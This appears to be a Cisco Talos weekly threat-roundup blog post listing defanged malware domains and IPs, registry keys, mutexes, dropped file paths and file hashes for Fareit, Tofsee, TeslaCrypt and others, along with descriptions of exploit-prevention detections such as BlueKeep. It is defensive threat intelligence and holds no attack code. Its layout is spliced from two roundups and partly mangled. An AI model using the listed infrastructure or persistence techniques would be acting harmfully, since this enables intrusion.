`QEKUSAGIGYZ[.]EU` | 18
`tuwypagupeb[.]eu` | 18
`FOBATESOHEK[.]EU` | 18
`NOVOMYFEXIJ[.]EU` | 18
`dixyjohevon[.]eu` | 18

*See JSON for more IOCs

Files and or directories created | Occurrences
---|---
`%TEMP%\<random, matching [A-F0-9]{1,4}>.tmp` | 18
`%SystemRoot%\AppPatch\ffiqrh.exe` | 1
`%SystemRoot%\AppPatch\jshtht.exe` | 1
`%SystemRoot%\AppPatch\akumbd.exe` | 1
`%SystemRoot%\AppPatch\rkhhmxr.exe` | 1
`%SystemRoot%\AppPatch\pvsvlhr.exe` | 1
`%SystemRoot%\AppPatch\hcbpdh.exe` | 1
`%SystemRoot%\AppPatch\suupehv.exe` | 1
`%SystemRoot%\AppPatch\atvoia.exe` | 1
`%SystemRoot%\AppPatch\xyovdf.exe` | 1
`%SystemRoot%\AppPatch\qoatnug.exe` | 1
`%SystemRoot%\AppPatch\stfvdxf.exe` | 1
`%SystemRoot%\AppPatch\crsadq.exe` | 1
`%SystemRoot%\AppPatch\iqxtlwt.exe` | 1
`%SystemRoot%\AppPatch\vgabmas.exe` | 1
`%SystemRoot%\AppPatch\cxglomg.exe` | 1
`%SystemRoot%\AppPatch\mrfdmsf.exe` | 1
`%SystemRoot%\AppPatch\eodhsml.exe` | 1
`%SystemRoot%\AppPatch\bjihnwq.exe` | 1

#### File Hashes

```
15e38b549194635dbbce0ddc2fa97744992498292843924d0ef12fb1804a285c
90fb3fc2fa229953c808954a8eec46b36f1edc0f41ab088c82ea755ffa3c43c2
9ca9c80c7aef1de747e8fb0fbe2fdabe0242862341eac562799b96f94830bd7a
a798d57162ee4fac07d2e23a16f9d0557d39f6c615a33add2a8f570177ae250e
b45da6a6c26ccecac46deeceed64bea1dc7753ebbd6fb93ad33048e0f8587f95
ba8e2507b98e11681912eb982779c5791bfd084f1683d0ec211f187c04444b4b
bf6c06b4720c871f38fe90fc4c2dd2a17fd3879b37668facd78f433309123094
c0b1f1dcd503c8e254cbc80478848db14d2ab731df0a3d3cd185d5df43727d54
cab99b6945c6ee017c2297f13f5962ff2be066c3c9f4b812f1183334ab133de0
cefb5097f6431abfd8ecaa842f8fd18e7c37b585c90ed7dab5cc58c985f327ce
d736eb2fa68eb8da82c3823e90bee6fb374f00d59b5ce26df9a8f8f6e807bf39
e4c8b631c928eec873f54c2811315e48962a8f5e067e3f820e22fbfbb04755eb
e7df207595977cf6802d5d039c76a91ace32521f290d115c06325bb8a72ce18e
ea0ea261f2a0211dc179b23bf18609749df13f024db3384cf1f7f54d09a3e21d
ea9b003f2dd1f2293add17f6607370a130d3efff27d55c5068c7ac8abcbfb76b
eeb8342fd7c3ee5b7bb9b714899dc0b2b97597562022015b9d1d2464e7cd55d3
fce2a9dee62b71966aca7874ff8f37066a0323c73e5e524162b36b114a92894f
fdbae139d64ee88eacf6ade8b366666432bc944430ab7dd0cf1af7156cb7d316
```

#### Coverage

Product | Protection
---|---
Amp |
Cloudlock | N/A
Cws |
Email Security |
Network Security |
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid |
Umbrella |
Wsa |

#### Screenshots of Detection

#### AMP

![AMP detection](<https://1.bp.blogspot.com/-INbzbMqgncM/XVbNu-EqnkI/AAAAAAAACXk/1AH5j9Zn4ngwkbFEFKmjAjo7h_26rIZOgCLcBGAs/s1600/fdbae139d64ee88eacf6ade8b366666432bc944430ab7dd0cf1af7156cb7d316_amp.png>)

#### ThreatGrid

![ThreatGrid detection](<https://1.bp.blogspot.com/-tMC4lirZBsQ/XVbNypEJNVI/AAAAAAAACXo/aiG82MvXQK8aKr_NtMJ8Bc_-4ORBuQBNgCLcBGAs/s1600/fdbae139d64ee88eacf6ade8b366666432bc944430ab7dd0cf1af7156cb7d316_tg.png>)

#### Umbrella

![Umbrella detection](<https://1.bp.blogspot.com/-GE6eLpprZfo/XVbN4cdsAyI/AAAAAAAACXs/0QeZIqU82vMaBmLk5x2XPwwkuDw93GzowCLcBGAs/s1600/3459368ab88453104477c3c4224193a9f10fc8a78ff3940665b8607c4bd13153_umbrella.png>)

* * *

## Exploit Prevention

Cisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from the memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities.

**CVE-2019-0708 detected - (1553)**

An attempt to exploit CVE-2019-0708 has been detected. The vulnerability, dubbed BlueKeep, is a heap memory corruption that can be triggered by sending a specially crafted Remote Desktop Protocol (RDP) request. Since this vulnerability can be triggered without authentication and allows remote code execution, it can be used by worms to spread automatically without human interaction.

**Kovter injection detected - (1465)**

A process was injected into, most likely by an existing Kovter infection. Kovter is a click-fraud Trojan that can also act as an information stealer. Kovter is also fileless malware, meaning the malicious DLL is stored inside the Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as Wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns.

**Process hollowing detected - (1288)**

Process hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory.
The parent then manually sets up the first stages of launching a child process, but before launching it, the child's memory is cleared and filled in with memory from the parent instead.

**Madshi injection detected - (1157)**

Madshi is a code injection framework that uses process injection to start a new thread if other methods of starting a thread within a process fail. This framework is used by a number of security solutions. It is also possible for malware to use this technique.

**Trickbot malware detected - (742)**

Trickbot is a banking Trojan that appeared in late 2016. Due to the similarities between Trickbot and Dyre, it is suspected that some of the individuals responsible for Dyre are now responsible for Trickbot. Trickbot has been rapidly evolving in the months since it appeared. However, Trickbot is still missing some of the capabilities Dyre possessed. Its current modules include DLL injection, system information gathering, and email searching.

**Dealply adware detected - (417)**

DealPly is adware that claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements into webpages. Adware has also been known to download and install malware.

**Gamarue malware detected - (151)**

Gamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system.

**Installcore adware detected - (75)**

InstallCore is an installer that bundles legitimate applications with offers for additional third-party applications that may be unwanted. The unwanted applications are often adware that displays advertising in the form of pop-ups or by injecting into browsers and adding or altering advertisements on webpages. Adware is known to sometimes download and install malware.
**Excessively long PowerShell command detected - (72)**

A PowerShell command with a very long command-line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell-based threats.

**PowerShell file-less infection detected - (67)**

A PowerShell command was stored in an environment variable and run. The environment variable is commonly set by a previously run script and is used as a means of evasion. This behavior is a known tactic of the Kovter and Poweliks malware families.

* * *

Title Threat Roundup for August 9 to August 16 ID TALOSBLOG:AE189A67BCAD633AD9D7838F9DF4F6D5 Type talosblog Published 2019-08-16T09:44:46 Modified 2019-08-16T09:44:46 CVSS 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C) Href http://feedproxy.google.com/~r/feedburner/Talos/~3/Zt-_TgfJK3M/threat-roundup-0809-0816.html

* * *

Last seen 2019-08-02T16:45:00 Bulletin family blog CVE list CVE-2019-0708
Description
Today, Talos is publishing a glimpse into the most prevalent threats we've observed between July 26 and Aug. 2. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication.
Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

For each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found [here](<https://alln-extcloud-storage.cisco.com/ciscoblogs/5d444a0f0c20b.txt>) that includes the complete list of file hashes, as well as all other IOCs from this post. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicate maliciousness.

The most prevalent threats highlighted in this roundup are:

Threat Name | Type | Description
---|---|---
Win.Trojan.Fareit-7090291-0 | Trojan | The Fareit trojan is primarily an information stealer with functionality to download and install other malware.
Win.Malware.Tofsee-7090196-1 | Malware | Tofsee is multipurpose malware that features a number of modules used to carry out various activities, such as sending spam messages, conducting click fraud, mining cryptocurrency, and more. Infected systems become part of the Tofsee spam botnet and are used to send large volumes of spam messages in an effort to infect additional systems and increase the overall size of the botnet under the operator's control.
Win.Ransomware.TeslaCrypt-7090181-1 | Ransomware | TeslaCrypt is a well-known ransomware family that encrypts a user's files with strong encryption and demands Bitcoin in exchange for a file decryption service. A flaw in the encryption algorithm was discovered that allowed files to be decrypted without paying the ransom, and eventually the malware developers released the master key, allowing all encrypted files to be recovered easily.
Win.Virus.Parite-7090021-0 | Virus | Parite is a polymorphic file infector. It infects executable files on the local machine and on network drives.
Win.Malware.Remcos-7089920-1 | Malware | Remcos is a remote access trojan (RAT) that allows attackers to execute commands on the infected host, log keystrokes, interact with a webcam, and capture screenshots. It is commonly delivered through Microsoft Office documents with macros, sent as attachments on malicious emails.
Win.Dropper.Kovter-7086582-0 | Dropper | Kovter is known for its fileless persistence mechanism. This family of malware creates several malicious registry entries that store its malicious code. Kovter is capable of reinfecting a system even if the file system has been cleaned of the infection. Kovter has been used in the past to spread ransomware and click-fraud malware.
Win.Dropper.Miner-7086571-0 | Dropper | This malware installs and executes cryptocurrency mining software. You can read more about this kind of threat on our blog: https://blog.talosintelligence.com/2018/07/blocking-cryptomining.html
Win.Trojan.Zegost-7086512-0 | Trojan | Zegost, also known as "Zusy," uses man-in-the-middle attacks to steal banking information. When executed, it injects itself into legitimate Windows processes such as "explorer.exe" and "winver.exe." When the user accesses a banking website, it displays a form to trick the user into submitting personal information.
Win.Dropper.Ursnif-7083691-0 | Dropper | Ursnif is used to steal sensitive information from an infected host and can also act as a malware downloader. It is commonly spread through malicious emails or exploit kits.

* * *

## Threat Breakdown

### Win.Trojan.Fareit-7090291-0

#### Indicators of Compromise

Registry Keys | Occurrences
---|---
`<HKCU>\Software\WinRAR` | 6
`<HKCU>\SOFTWARE\WINRAR`, Value Name: `HWID` | 6
`<HKLM>\SAM\SAM\DOMAINS\ACCOUNT\USERS\000003E9`, Value Name: `F` | 6
`<HKLM>\SAM\SAM\DOMAINS\ACCOUNT\USERS\000001F5`, Value Name: `F` | 6
`<HKLM>\SAM\SAM\DOMAINS\ACCOUNT\USERS\000003EC`, Value Name: `F` | 6

Mutexes | Occurrences
---|---
`Global\b7b392a1-b3e0-11e9-a007-00501e3ae7b5` | 9

IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
---|---
`77[.]111[.]240[.]77` | 3

Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
---|---
`dkaul[.]su` | 3
`kglso[.]ru` | 3
`FFUEX[.]SU` | 3
`mmbild[.]se` | 3
`digitalimagellc[.]us` | 3
`PLNDIGITAL[.]ORG` | 3
`brettsplus[.]com[.]au` | 3

Files and or directories created | Occurrences
---|---
`%TEMP%\<random, matching '[a-f0-9]{3,5}'>_appcompat.txt` | 9
`%TEMP%\<random, matching '[A-F0-9]{4,5}'>.dmp` | 9
`%System32%\config\SAM` | 6
`%TEMP%\-959430038.bat` | 1
`%TEMP%\94859.bat` | 1
`%TEMP%\-958164199.bat` | 1
`%TEMP%\-958105901.bat` | 1
`%TEMP%\-958121813.bat` | 1
`%TEMP%\-958085949.bat` | 1
`%TEMP%\-958128100.bat` | 1
`%TEMP%\86484.bat` | 1
`%TEMP%\100125.bat` | 1
`%TEMP%\92015.bat` | 1
`%TEMP%\92140.bat` | 1
`%TEMP%\93656.bat` | 1

#### File Hashes

```
037dbde69db377adba75065b57b988175b883d5d22a0211f78cd8e3ea63a8c0b
04d401c93e8648d698044aa500afbe0d1ba2e6352b208bac1f31e65f3786a6f4
0a860e6eace6b4fb43c40e1d1ff5aa646771fbb890afc291da814f7a7b66a686
2c022ec86c02f2629ad5e6db757a2ee169a7071e5ad458afdaf42b7e8dd24d37
3680f7e4dcf0416edb86258c24c6d41aae1fa7a37b2eb26a829dd4979ec28810
37d97b05a5f046eaa1939c9eacca2f337a3239bb00cd4895772547c5bc738831
912c9de409dee4bbfb4c29e4ef968e6df4a34e106ca49761b7ad47994f445f15
93669f7e7726bc9d4aaa24dcd8f84b0ccc30dbcefc974d6f4ea361179203c8e2
9d723fbcbb53a3b7f55cb1d6bcd9bd35d7f5eed752c90147cf6b9d72c2217409
9f38462f183111e0bff6672ac65485ce1d4593a31153f07d8cc9ce6f4edc6821
a67a928a736c05e48b977a0a2a140bd1ff2729b8d260a2dafae9871822cc14a3
c55d9bc607cf45dcc2fc66f6aca60d495ea4ac32c52828112e67a24761164fc7
d3dc4b97c1dda85f27401227881ce1f5267d6ceadf7f884b9e0264648f0687b1
dd563db1527d80f0b402fc44116a1de141d52226b245fa23e754b1b1e30514d9
f2399366114ae7a2567992ac96d06ca86f052bc0f90a4ccc3638807d2624de84
```

#### Coverage

Product | Protection
---|---
Amp |
Cloudlock | N/A
Cws |
Email Security |
Network Security | N/A
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid |
Umbrella | N/A
Wsa | N/A

#### Screenshots of Detection

#### AMP

![AMP detection](<https://1.bp.blogspot.com/-gs4-ZkaslIY/XURDF3XnwpI/AAAAAAAAB4o/wfo2xqLsTcIAs-7WHpWtMG4ETWp1AKscQCEwYBhgL/s1600/37d97b05a5f046eaa1939c9eacca2f337a3239bb00cd4895772547c5bc738831_amp.png>)

#### ThreatGrid

![ThreatGrid detection](<https://1.bp.blogspot.com/-gA88qSUJ5Gw/XURDXERyOvI/AAAAAAAAB4w/nF8L0cTFKVcM_P4-8Hfjwax7QjPVcnO9ACLcBGAs/s1600/37d97b05a5f046eaa1939c9eacca2f337a3239bb00cd4895772547c5bc738831_tg.png>)

* * *

### Win.Malware.Tofsee-7090196-1

#### Indicators of Compromise

Registry Keys | Occurrences
---|---
`<HKLM>\System\CurrentControlSet\Services\NapAgent\Shas` | 36
`<HKLM>\System\CurrentControlSet\Services\NapAgent\Qecs` | 36
`<HKLM>\System\CurrentControlSet\Services\NapAgent\LocalConfig` | 36
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\NAPAGENT\LOCALCONFIG\Enroll\HcsGroups` | 36
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\NAPAGENT\LOCALCONFIG\UI` | 36
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>` | 36
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>`, Value Name: `Type` | 36
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>`, Value Name: `Start` | 36
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>`, Value Name: `ErrorControl` | 36
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>`, Value Name: `DisplayName` | 36
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>`, Value Name: `WOW64` | 36
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>`, Value Name: `ObjectName` | 36
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>`, Value Name: `Description` | 36
`<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS`, Value Name: `C:\Windows\SysWOW64\sraabisk` | 6
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SRAABISK`, Value Name: `ImagePath` | 6
`<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS`, Value Name: `C:\Windows\SysWOW64\poxxyfph` | 5
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\POXXYFPH`, Value Name: `ImagePath` | 5
`<HKCU>\SOFTWARE\MICROSOFT\Java VM` | 3
`<HKCU>\SOFTWARE\MICROSOFT\VBA` | 3
`<HKCU>\SOFTWARE\MICROSOFT\IME` | 3
`<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS`, Value Name: `C:\Windows\SysWOW64\xwffgnxp` | 3
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\XWFFGNXP`, Value Name: `ImagePath` | 3
`<HKCU>\Software\Microsoft\<random, matching '[A-Z][a-z]{3,11}'>` | 3
`<HKCU>\SOFTWARE\MICROSOFT\Direct3D` | 2
`<HKCU>\SOFTWARE\MICROSOFT\TPG` | 2

Mutexes | Occurrences
---|---
`Frz_State` | 3
`Sandboxie_SingleInstanceMutex_Control` | 3
`8C7EF2D18C62E966FAA2F103BC71DB04` | 3
`B76FD347C7201967BD7510FFC887D89D` | 3
`F81EAF302D1CAD1CD52C598895B98F49` | 3
`B55D882B6AD53F2630F641F93DBC6632` | 3
`DFD9CCD816EA09FA87380EE972D3FE0A` | 3
`947A2F20D44434751A1FD63E133D3883` | 3
`27F7FFA07BD0546DF3E613F21C61F3E9` | 3
`B159CDAF25784C79CB1C9F0CDF12E94C` | 3
`891B5C99F4D8068194399C87B72D54C6` | 3
`9EA2A5F4E10686779AD6C370F4D8A134` | 3
`A4F11C837EB2FB7FE5D4A9AAC3668D44` | 3
`FCC07BE63C5A293474A56972D25359B2` | 3
`\BaseNamedObjects\55316F50AA5F7C0AF74B646D5BA30B6C` | 1
`\BaseNamedObjects\F6634E1FD2EF7234AA9F24F39DA8C989` | 1
`\BaseNamedObjects\ED5F41B655CEDB95F08EE542BD539E90` | 1
`\BaseNamedObjects\FD509C28F9012AA4076303B64747B793` | 1
`\BaseNamedObjects\CD01D078DCB1643DC8E3667F120CAB40` | 1
`\BaseNamedObjects\6F9EA2070C7CC350EF1BF8B5AC5A9601` | 1
`\BaseNamedObjects\CA8A51536CF3D38C27A4072A756591C1` | 1
`\BaseNamedObjects\B3E288CBEA2F275076EA13D7EAA6AA2B` | 1
`\BaseNamedObjects\5904F95108046C70AE0DC46DD119468C` | 1
`\BaseNamedObjects\DAB8A830ADCB8D21D190CF3C585F3F91` | 1
`\BaseNamedObjects\DB628CF0707BDD5E042097FDB915669A` | 1

*See JSON for more IOCs

IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
---|---
`103[.]248[.]137[.]133` | 36
`111[.]121[.]193[.]242` | 36
`104[.]47[.]53[.]36` | 19
`104[.]47[.]54[.]36` | 17
`104[.]215[.]148[.]63` | 11
`40[.]112[.]72[.]205` | 9
`40[.]76[.]4[.]15` | 8
`40[.]113[.]200[.]201` | 5
`185[.]198[.]57[.]151` | 1

Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
---|---
`microsoft-com[.]mail[.]protection[.]outlook[.]com` | 36
`gordinka[.]xyz` | 3

Files and or directories created | Occurrences
---|---
`%TEMP%\<random, matching '[a-z]{8}'>.exe` | 36
`%SystemRoot%\SysWOW64\<random, matching '[a-z]{8}'>` | 36
`%System32%\<random, matching '[a-z]{8}\[a-z]{6,8}'>.exe (copy)` | 35
`%HOMEPATH%\NTUSER.DAT` | 3
`%HOMEPATH%\ntuser.dat.LOG1` | 3
`%APPDATA%\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\webappsstore.tmp` | 1
`%TEMP%\akylzxd.exe` | 1
`%TEMP%\6656.bat` | 1
`%TEMP%\2712.bat` | 1
`%TEMP%\6820.bat` | 1
`%TEMP%\6042.bat` | 1
`%TEMP%\8737.bat` | 1
`%TEMP%\7438.bat` | 1
`%TEMP%\8443.bat` | 1
`%TEMP%\0502.bat` | 1
`%TEMP%\1752.bat` | 1
`%TEMP%\6287.bat` | 1
`%TEMP%\3440.bat` | 1
`%TEMP%\8320.bat` | 1
`%TEMP%\8476.bat` | 1
`%TEMP%\2350.bat` | 1
`%TEMP%\0526.bat` | 1
`%TEMP%\3735.bat` | 1
`%TEMP%\8143.bat` | 1
`%TEMP%\8515.bat` | 1

*See JSON for more IOCs

#### File Hashes

```
0272591f11ebfafde7cbb811ce4d4cc8d650956e8ea850c0751ac2f4de954138
0528c84d8c9003db021603719a7649c359221c6d7b2ad918726f8bf48f5cc5c9
06ffafb628585e4db0e5663baca4bd11378f6a381994fd55194f9f071c3c5a0c
0bcba9302e58883bb6dc4b68ebf28e0849845d4bbf469b08b465a0bee4d69bd3
12b98384530eb3f073a46c50a7ad0248389b11b2d6c508e33f71bbf034578aa0
18b39e415880a0c86ac92ccaeb4b69ca6aeb7d800661b03249b9e522903ed38c
1ad0c706365e29e30a208cb8058b3f8023ab9838e728b83de99412ca3015c6a2
2622d0798a83e1377c5a495b12e23e77bef09bcfb3b880aa521ca2b402ff5f4e
2691b34696328d028edab98a5dcaf3e5d492908c5ba0d16d8cdb8927dd614fcc
29393f713a89a7529e4e66793a042c349ea7967957b0c02b8c6b40f3f05b52d0
2c77eaf233dec2d3b165dccec7350c0b4653e0db550fb14c1d3571bbd1a4d403
2c9c2c4bdb923a21057cb24a54cd593f61af0b913215911db43a939b4550a9c5
3070f13f4d3db4bee1c37eeafb6de059d6e172a40bdef17e3a778a71176ddf6d
394cb2df083d3106b6e659fdd8ec27514a82c2c48d9b21aa189efcce6a321677
3a8a90823aee9b2fa6bd72548b7b69b5d1e0917fcf10065ade2c944eac9fd703
3e5723f2b6a2480d4b0a3aac03e457e8abf21ef72eab2bd5d7ced9908eec929c
3e9abc021820c1f954388b59dc5d6f9a48b6bf15a22168576fa007778f5fe6cb
4193bb216522035460434b367f699ac2211317bcf86f777709fe2d1ab01bf649
48118321467cab596dbb1f049f3fed4b6cee2621933124f1bb3d36db5ea7aaf6
4c10c671efd90d492b7ddc4a9a20e0d8ec306fb333710f20f698c533331c4c04
4ee8e166d1f8f358038947b9a0a1d2c4d552112e179fdfa536769a9e79b2bbfe
4fe975be2d2cce5c26a849ea1d6d9342dfa79d332bed221736463427a45b22c5
5090d89adf0523559aba758adb1bf3c1f1afe20e354242a96020c41816652cbf
52d32a74235bdfac594154dedaf572d4cd38148016dc3ab4e4ae4c325b813bb7
556386fd0ca3000d635251734cfdffdbb4e8331c9c4ea6f576196f4a5fc3d21e
```

*See JSON for more IOCs

#### Coverage

Product | Protection
---|---
Amp |
Cloudlock | N/A
Cws |
Email Security |
Network Security | N/A
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid |
Umbrella |
Wsa |

#### Screenshots of Detection

#### AMP

![AMP detection](<https://1.bp.blogspot.com/-z5EKnIrTjKo/XURDgQzROJI/AAAAAAAAB40/ktRI_ASY4NIgMmeAXpkrRiFiDASMquqoQCLcBGAs/s1600/f64709e66da43b034d3fcf8a771b379df280f11e2d341e0b0eeba867397da194_amp.png>)

#### ThreatGrid

![ThreatGrid detection](<https://1.bp.blogspot.com/-yr1-tPZ-9Bc/XURDlxX-5YI/AAAAAAAAB44/cZVrdRjs0XcBLBRoAbMwDFil8itA7WC8gCLcBGAs/s1600/4fe975be2d2cce5c26a849ea1d6d9342dfa79d332bed221736463427a45b22c5_tg.png>)

#### Umbrella

![Umbrella detection](<https://1.bp.blogspot.com/-yPLf_xET_X0/XURDq-WO_OI/AAAAAAAAB5A/z-WfuOAHizEhBNRXqsR7h3LQnweLCQgRgCLcBGAs/s1600/5090d89adf0523559aba758adb1bf3c1f1afe20e354242a96020c41816652cbf_umbrella.png>)

* * *

### Win.Ransomware.TeslaCrypt-7090181-1

#### Indicators of Compromise

Registry Keys | Occurrences
---|---
`<HKCU>\CONTROL PANEL\DESKTOP`, Value Name: `TileWallpaper` | 13
`<HKCU>\CONTROL PANEL\DESKTOP`, Value Name: `WallpaperStyle` | 13
`<HKCU>\CONTROL PANEL\DESKTOP`, Value Name: `Wallpaper` | 13
\n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: msconfig ` | 13 \nMutexes | Occurrences \n---|--- \n`dslhufdks3` | 13 \n`Global\\1e6e4b01-b3e8-11e9-a007-00501e3ae7b5` | 5 \n`\\BaseNamedObjects\\RAS_MO_02` | 2 \n`\\BaseNamedObjects\\Global\\ADAP_WMI_ENTRY` | 2 \n`\\BaseNamedObjects\\Global\\RAS_MO_01` | 2 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`216[.]239[.]34[.]21` | 5 \n`216[.]239[.]38[.]21` | 4 \n`216[.]239[.]32[.]21` | 3 \n`148[.]81[.]111[.]121` | 2 \n`88[.]198[.]69[.]43` | 2 \n`194[.]150[.]168[.]74` | 2 \n`216[.]239[.]36[.]21` | 1 \n`192[.]35[.]177[.]64` | 1 \n`52[.]2[.]137[.]199` | 1 \n`104[.]216[.]88[.]248` | 1 \n`162[.]255[.]119[.]227` | 1 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`ipinfo[.]io` | 13 \n`epmhyca5ol6plmx3[.]wh47f2as19[.]com` | 13 \n`epmhyca5ol6plmx3[.]tor2web[.]fi` | 13 \n`epmhyca5ol6plmx3[.]tor2web[.]blutmagie[.]de` | 13 \n`7tno4hib47vlep5o[.]7hwr34n18[.]com` | 13 \n`ant[.]trenz[.]pl` | 2 \n`ymxunc[.]com` | 1 \n`iiiavb[.]com` | 1 \n`ergcgi[.]com` | 1 \n`giyxhd[.]com` | 1 \n`lxecov[.]com` | 1 \n`ymjjaz[.]com` | 1 \n`uunzlo[.]com` | 1 \n`exukeu[.]com` | 1 \n`ogcfic[.]com` | 1 \n`ihpuyg[.]com` | 1 \n`yqnonu[.]com` | 1 \n`hzadcu[.]com` | 1 \n`fogwee[.]com` | 1 \n`aiszao[.]com` | 1 \n`fasuoi[.]com` | 1 \n`bsieau[.]com` | 1 \n`azuyzw[.]com` | 1 \n`aldcea[.]com` | 1 \n`gknysc[.]com` | 1 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`%APPDATA%\\key.dat` | 15 \n`%APPDATA%\\log.html` | 15 \n`%APPDATA%\\HELP_RESTORE_FILES.txt` | 15 \n`%HOMEPATH%\\Desktop\\CryptoLocker.lnk` | 15 \n`%HOMEPATH%\\Desktop\\HELP_RESTORE_FILES.bmp` | 15 \n`%HOMEPATH%\\Desktop\\HELP_RESTORE_FILES.txt` | 15 \n`%HOMEPATH%\\Favorites\\HELP_RESTORE_FILES.txt` | 15 \n`%HOMEPATH%\\Favorites\\Links\\HELP_RESTORE_FILES.txt` | 15 \n`%HOMEPATH%\\Favorites\\Microsoft Websites\\HELP_RESTORE_FILES.txt` 
| 15 \n`%HOMEPATH%\\HELP_RESTORE_FILES.txt` | 15 \n`%HOMEPATH%\\Local Settings\\HELP_RESTORE_FILES.txt` | 15 \n`%HOMEPATH%\\NetHood\\HELP_RESTORE_FILES.txt` | 15 \n`%HOMEPATH%\\PrintHood\\HELP_RESTORE_FILES.txt` | 15 \n`%HOMEPATH%\\Recent\\HELP_RESTORE_FILES.txt` | 15 \n`%HOMEPATH%\\SendTo\\HELP_RESTORE_FILES.txt` | 15 \n`%HOMEPATH%\\Start Menu\\HELP_RESTORE_FILES.txt` | 15 \n`%HOMEPATH%\\Templates\\HELP_RESTORE_FILES.txt` | 15 \n`%TEMP%\\HELP_RESTORE_FILES.txt` | 15 \n`%APPDATA%\\Microsoft\\HELP_RESTORE_FILES.txt` | 15 \n`%APPDATA%\\Microsoft\\Internet Explorer\\HELP_RESTORE_FILES.txt` | 15 \n`%HOMEPATH%\\My Documents\\HELP_RESTORE_FILES.txt` | 15 \n`%APPDATA%\\<random, matching [A-Fa-z0-9]{5,8}.exe` | 15 \n`\\$Recycle.Bin\\HELP_RESTORE_FILES.txt` | 13 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\HELP_RESTORE_FILES.txt` | 13 \n`%HOMEPATH%\\AppData\\HELP_RESTORE_FILES.txt` | 13 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 0440593af56240ec063b2b37c106fc13375c2f503fdb707f9a83dd512c110430 11aaa79c21033387be690f5cf986c3c665d935a73682a16f5468c0b0a29ad2b6 1ccde26dc844e8c9fac9f94c2b4b1280fb69bd4f6759b944773e37be54e0d893 48113627269680d6875edef5b537babe9f99b2beb24aa1bc59aba2c12a8db364 4dff2478037871b72eecbeed8e0c4ba84aa0eab8ae54282a172cfb2059ceb74a 561465d60606ce7533cc049cc5025c426d888acf44d3334bcb5ff124cc9beb9f 58712cf1cab21e5e62d71ac9291eddcbda43944dc85f3eb91cee93d603761d56 5b076ac98c514923e6eb20cb3bd64db901988976af434052d5537c258a03614e 5eb80c4b9818c022a4b1e7cc5dbfca4c573cf76dfaf8ce7f8f8fa31dfbf77c4c 733f08642330249b7362d5496e7d5ddc660e69b99fcbf0128f3f6e647714dd86 7cc97b2908e9d76a917b37ca6433d451a5a0d866e18b0f92146c25bb56847a35 9b462800f1bef019d7ec00098682d3ea7fc60e6721555f616399228e4e3ad122 b1fbb20c2a4df11fe9a316156977f4f842c3c1f150c10e873cbac59aec43426c b7b24dc901e44293beaaa7ec379b8e8feb917abde42fdcdb38de5eda3cb147fa bb276ee7a6272c91c77fd973e1cd2a42e04274ca122eb28f4445cc1e8e49a014 
